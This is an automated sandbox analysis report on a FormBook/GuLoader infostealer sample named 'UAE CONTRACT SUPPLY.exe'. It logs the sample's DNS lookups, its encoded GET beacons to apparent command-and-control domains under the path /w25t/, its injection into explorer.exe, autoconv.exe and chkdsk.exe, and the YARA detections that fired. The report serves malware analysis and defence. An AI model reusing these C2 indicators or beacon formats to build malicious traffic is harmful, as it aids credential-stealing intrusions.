                                                        Feb 25, 2021 15:28:26.025517941 CET53611788.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:31.063088894 CET5701753192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:31.136027098 CET53570178.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:36.343516111 CET5632753192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:36.406847000 CET53563278.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:39.415992022 CET5024353192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:39.467735052 CET53502438.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:39.870378017 CET6205553192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:39.935050964 CET53620558.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:46.895540953 CET6124953192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:47.162172079 CET53612498.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:52.174387932 CET6525253192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:52.288326025 CET53652528.8.8.8192.168.2.6
                                                        Feb 25, 2021 15:28:57.299858093 CET6436753192.168.2.68.8.8.8
                                                        Feb 25, 2021 15:28:57.367551088 CET53643678.8.8.8192.168.2.6

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Feb 25, 2021 15:27:34.770870924 CET192.168.2.68.8.8.80xf69cStandard query (0)doc-08-78-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:27:38.197658062 CET192.168.2.68.8.8.80xe44eStandard query (0)cdn.onenote.netA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:14.912911892 CET192.168.2.68.8.8.80xce23Standard query (0)www.aserchofalltrades.comA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:20.623471975 CET192.168.2.68.8.8.80x6a23Standard query (0)www.parentseducationalco-op.comA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:25.941293001 CET192.168.2.68.8.8.80x489fStandard query (0)www.blackholidayco.comA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:31.063088894 CET192.168.2.68.8.8.80x777dStandard query (0)www.allsalesvinyl.netA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:36.343516111 CET192.168.2.68.8.8.80x5687Standard query (0)www.pardsoda.comA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:46.895540953 CET192.168.2.68.8.8.80x1dc8Standard query (0)www.asesorgrupovivir.comA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:52.174387932 CET192.168.2.68.8.8.80x4206Standard query (0)www.joybirder.comA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:57.299858093 CET192.168.2.68.8.8.80x584bStandard query (0)www.sixteen3handscottages.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Feb 25, 2021 15:27:34.839993000 CET8.8.8.8192.168.2.60xf69cNo error (0)doc-08-78-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:27:34.839993000 CET8.8.8.8192.168.2.60xf69cNo error (0)googlehosted.l.googleusercontent.com142.250.184.65A (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:27:38.256480932 CET8.8.8.8192.168.2.60xe44eNo error (0)cdn.onenote.netcdn.onenote.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:14.984534025 CET8.8.8.8192.168.2.60xce23No error (0)www.aserchofalltrades.comwww0.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:14.984534025 CET8.8.8.8192.168.2.60xce23No error (0)www0.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:14.984534025 CET8.8.8.8192.168.2.60xce23No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:14.984534025 CET8.8.8.8192.168.2.60xce23No error (0)5f36b111-balancer.wixdns.nettd-balancer-dc11-60-102.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:14.984534025 CET8.8.8.8192.168.2.60xce23No error (0)td-balancer-dc11-60-102.wixdns.net185.230.60.102A (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:20.691571951 CET8.8.8.8192.168.2.60x6a23No error (0)www.parentseducationalco-op.comparentseducationalco-op.comCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:20.691571951 CET8.8.8.8192.168.2.60x6a23No error (0)parentseducationalco-op.com34.102.136.180A (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:26.025517941 CET8.8.8.8192.168.2.60x489fName error (3)www.blackholidayco.comnonenoneA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:31.136027098 CET8.8.8.8192.168.2.60x777dNo error (0)www.allsalesvinyl.netallsalesvinyl.netCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:31.136027098 CET8.8.8.8192.168.2.60x777dNo error (0)allsalesvinyl.net34.102.136.180A (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:36.406847000 CET8.8.8.8192.168.2.60x5687No error (0)www.pardsoda.com104.21.32.11A (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:36.406847000 CET8.8.8.8192.168.2.60x5687No error (0)www.pardsoda.com172.67.182.32A (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:47.162172079 CET8.8.8.8192.168.2.60x1dc8Server failure (2)www.asesorgrupovivir.comnonenoneA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:52.288326025 CET8.8.8.8192.168.2.60x4206Server failure (2)www.joybirder.comnonenoneA (IP address)IN (0x0001)
                                                        Feb 25, 2021 15:28:57.367551088 CET8.8.8.8192.168.2.60x584bNo error (0)www.sixteen3handscottages.comsixteen3handscottages.comCNAME (Canonical name)IN (0x0001)
                                                        Feb 25, 2021 15:28:57.367551088 CET8.8.8.8192.168.2.60x584bNo error (0)sixteen3handscottages.com34.102.136.180A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • www.aserchofalltrades.com
                                                        • www.parentseducationalco-op.com
                                                        • www.allsalesvinyl.net
                                                        • www.pardsoda.com
                                                        • www.sixteen3handscottages.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.649749185.230.60.10280C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 25, 2021 15:28:15.124083996 CET6318OUTGET /w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRp HTTP/1.1
                                                        Host: www.aserchofalltrades.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Feb 25, 2021 15:28:15.270668030 CET6320INHTTP/1.1 404 Not Found
                                                        Date: Thu, 25 Feb 2021 14:28:15 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        x-wix-request-id: 1614263295.2061857739024538739
                                                        vary: Accept-Encoding
                                                        Age: 0
                                                        X-Seen-By: jeslxIFvDH4ulYwNNi+3Muwfbs+7qUVAqsIx00yI78k=,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgAmI6NXu6WfqLI/M7f8tcV,2d58ifebGbosy5xc+FRaljJhPW/QGfx+q8yY6tJt4liplW2KIFCnP2WuDwYfqFs95giHFpZ7ywPurTQjYl2cGQ==,2UNV7KOq4oGjA5+PKsX47Ay/vVeTGg75VNBOw8znOgAfbJaKSXYQ/lskq2jK6SGP,m0j2EEknGIVUW/liY8BLLsk16xozuw6nSXf6CEzK6Aca0sM5c8dDUFHeNaFq0qDu,JLaio/7uvfP647F5CQsGZbrBoTckX0poWZhq63wruFRGp/J3MBzgzU8QHrQuh4zQ,9phxMuSXVGy04obH0oEnZZDXl7I7ILTyJojtezEQxYM0d1JjSaSBjnO+SH73qBkvWIHlCalF7YnfvOr2cMPpyw==
                                                        Server: Pepyaka/1.15.10
                                                        Data Raw: 62 39 33 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 77 69 78 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66
                                                        Data Ascii: b93 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.64975134.102.136.18080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 25, 2021 15:28:20.735161066 CET6333OUTGET /w25t/?7nf0kP=Uq0CzCwvS6YoWMp/UCKN7JIAByS11Z6E5aUOsXAJZj+0yJL9Nk5m9Qz8CvCcNaQrIL6Vs/Uw3Q==&wj=hBZ8sVLxwZopBdRp HTTP/1.1
                                                        Host: www.parentseducationalco-op.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Feb 25, 2021 15:28:20.874774933 CET6334INHTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Thu, 25 Feb 2021 14:28:20 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "603155b8-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.64975234.102.136.18080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 25, 2021 15:28:31.179930925 CET6335OUTGET /w25t/?7nf0kP=x6qnXySIKpUJn5XerhvX+0EMzo20pmQQj9ePwr3K6ImaWCKGjDlnwZkCLhxG6Ruvc228xc+5mw==&wj=hBZ8sVLxwZopBdRp HTTP/1.1
                                                        Host: www.allsalesvinyl.net
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Feb 25, 2021 15:28:31.319639921 CET6335INHTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Thu, 25 Feb 2021 14:28:31 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "603155b8-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.649753104.21.32.1180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 25, 2021 15:28:36.463717937 CET6337OUTGET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=15PPGsvA0OesMgSYtNkzWMXd9CXxAPrih7Pi9b51HvfmowsB4G7YJFhsDDlnN8h0byCLDSw3/g== HTTP/1.1
                                                        Host: www.pardsoda.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Feb 25, 2021 15:28:36.840812922 CET6338INHTTP/1.1 404 Not Found
                                                        Date: Thu, 25 Feb 2021 14:28:36 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Set-Cookie: __cfduid=d35892cfcfe1bc318a38c848d3a378eab1614263316; expires=Sat, 27-Mar-21 14:28:36 GMT; path=/; domain=.pardsoda.com; HttpOnly; SameSite=Lax
                                                        Vary: Accept-Encoding
                                                        X-Turbo-Charged-By: LiteSpeed
                                                        CF-Cache-Status: DYNAMIC
                                                        cf-request-id: 087b3088120000fa7893ab1000000001
                                                        Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WkXIJ7%2FAsz6AvZSkytfDz1k50V5knPWTBe82bGry9sZdF6i4ecrchrXd44gYsxTh9Sfky4%2FvUbw16TDqu7N7FE%2B5SueMrWfq%2FJPsAWv7EJdk"}],"group":"cf-nel"}
                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 62721d201fcefa78-AMS
                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                        Data Raw: 32 38 37 39 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: 2879<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px;


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.64975634.102.136.18080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 25, 2021 15:28:57.410073996 CET6366OUTGET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=SQSlpqwSeyxeA2HWARjbLzFChTkDZ06wC9CS935ywhThxAQMIzjb51bRjEk1pH3EnhYaWQ8xDg== HTTP/1.1
                                                        Host: www.sixteen3handscottages.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Feb 25, 2021 15:28:57.549735069 CET6366INHTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Thu, 25 Feb 2021 14:28:57 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "60363547-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                        HTTPS Packets

                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                        Feb 25, 2021 15:27:34.976358891 CET142.250.184.65443192.168.2.649731CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Tue Jan 26 10:05:02 CET 2021 Thu Jun 15 02:00:42 CEST 2017Tue Apr 20 11:05:01 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                        CN=GTS CA 1O1, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021

                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: UAE CONTRACT SUPPLY.exe PID: 6848 Parent PID: 5676

                                                        General

                                                        Start time:15:26:42
                                                        Start date:25/02/2021
                                                        Path:C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
                                                        Imagebase:0x400000
                                                        File size:458752 bytes
                                                        MD5 hash:9DA74A6D583C801677C0E2FDE51586BA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Visual Basic
                                                        Reputation:low

                                                        Analysis Process: UAE CONTRACT SUPPLY.exe PID: 6952 Parent PID: 6848

                                                        General

                                                        Start time:15:26:54
                                                        Start date:25/02/2021
                                                        Path:C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe'
                                                        Imagebase:0x400000
                                                        File size:458752 bytes
                                                        MD5 hash:9DA74A6D583C801677C0E2FDE51586BA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Analysis Process: explorer.exe PID: 3440 Parent PID: 6952

                                                        General

                                                        Start time:15:27:37
                                                        Start date:25/02/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:
                                                        Imagebase:0x7ff6f22f0000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: autoconv.exe PID: 4804 Parent PID: 3440

                                                        General

                                                        Start time:15:27:51
                                                        Start date:25/02/2021
                                                        Path:C:\Windows\SysWOW64\autoconv.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                        Imagebase:0x12d0000
                                                        File size:851968 bytes
                                                        MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Analysis Process: chkdsk.exe PID: 392 Parent PID: 3440

                                                        General

                                                        Start time:15:27:51
                                                        Start date:25/02/2021
                                                        Path:C:\Windows\SysWOW64\chkdsk.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                        Imagebase:0x1340000
                                                        File size:23040 bytes
                                                        MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000010.00000002.633691017.0000000005BC7000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Author: Joe Security
